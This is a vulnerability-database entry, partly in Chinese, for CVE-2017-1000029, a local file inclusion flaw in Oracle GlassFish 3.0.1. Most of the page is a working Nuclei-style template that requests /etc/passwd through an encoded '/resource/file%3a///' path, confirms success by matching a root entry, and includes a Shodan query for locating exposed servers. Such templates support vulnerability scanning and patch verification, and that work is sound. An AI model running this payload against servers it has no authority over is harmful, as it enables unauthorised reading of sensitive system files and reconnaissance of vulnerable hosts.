CVE-2017-1000029: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Oracle GlassFish Server Open Source Edition | POC: 已公开

漏洞描述

Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.

PoC代码[已公开]

id: CVE-2017-1000029

info:
  name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
  reference:
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000029
    cwe-id: CWE-200
    epss-score: 0.72669
    epss-percentile: 0.98733
    cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: glassfish_server
    shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
  tags: cve,cve2017,glassfish,oracle,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/file%3a///etc/passwd/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100acb1db9421a28ac48496b128b1f1c3d744d10922e499de7a633dd7963f1224f102206bb152c88ea0f4a2f6b602a8a1971249ffa2d608fb23734415d70adc75b18f73:922c64590222798bb761d5b6d8e72950

相关漏洞推荐